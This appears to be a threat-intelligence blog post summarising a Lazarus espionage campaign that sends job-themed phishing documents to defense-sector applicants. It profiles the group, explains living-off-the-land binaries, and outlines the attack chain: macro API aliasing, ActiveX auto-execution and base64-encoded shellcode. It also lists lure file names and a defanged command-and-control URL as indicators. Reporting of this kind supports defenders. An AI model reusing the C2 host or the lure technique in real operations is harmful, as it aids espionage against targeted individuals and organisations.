Qualys Threat Research recently reported on a new Lazarus espionage campaign leveraging employment phishing emails to target the defense sector, primarily targeting those applying for a job at Lockheed Martin. The targeting is similar to previous Lazarus campaigns which targeted Northrop Grumman and BAE Systems. Qualys refers to the current campaign as LolZarus due to the threat actor group’s use of LoLbins in some of the samples, which according to Qualys is the first known use of LoLbins by a well-known threat actor group.
Who is Lazarus?
Lazarus, also known as Dark Seoul, Labyrinth Chollima, and APT 38, is a state-sponsored threat actor group likely affiliated with North Korea’s Reconnaissance General Bureau. The group’s members are reportedly trained in Shenyang, China in malware and espionage operations. Lazarus is known for espionage activity, disruptive activity, and financially motivated attacks. Known Lazarus TTPs include DDoS attacks, wiper malware, botnets, keyloggers, and RATs.
The group’s first known activity was Operation Troy, an espionage campaign targeting the South Korean government as early as 2009. Lazarus group’s espionage activity is in line with intelligence collection requirements for the North Korean government, targeting South Korea, the US, and other nations. Lazarus is thought to be responsible for the 2014 Sony Pictures attack and the 2017 WannaCry ransomware campaign. Lazarus has also targeted banks in Ecuador, Vietnam, Bangladesh, Mexico, Poland, and Taiwan and has been known to steal cryptocurrency. In 2020, Lazarus allegedly was responsible for an attack on multiple pharmaceutical companies, including AstraZeneca.
What Are LoLbins?
LoLbins, or Living off the Land Binaries, is a living off the land technique. Living off the land refers to a threat actor’s use of trusted, non-malicious system tools to spread malware. LoLbins relies on Windows binaries, including Microsoft signed binaries, to hide a threat actor’s malicious activity, allowing it to be obscured by normal system and network activity. Threat actors often leverage LoLbins for fileless malware attacks.
Qualys identified two malicious phishing documents used in the LolZarus campaign: Lockheed_Martin_JobOpportunities.docx and Salary_Lockheed_Martin_job_opportunities_confidential.doc. Macros within the documents use aliases to rename the APIs used. The macro uses ActiveX Frame1_Layout as an attack vector to automatically execute. The macro loads a Windows Media dll file WMVCORE.DLL then checks for a document variable before entering its main functionality block.
The second stage payload is shellcode embedded as a base64 encoded string array within the macro. The shellcode uses advanced techniques to hijack control flow then sets up a connection to the C2 at https://markettrendingcenter[.]com/member[.]htm.
PolySwarm has multiple samples associated with Lazarus APT’s LolZarus activity.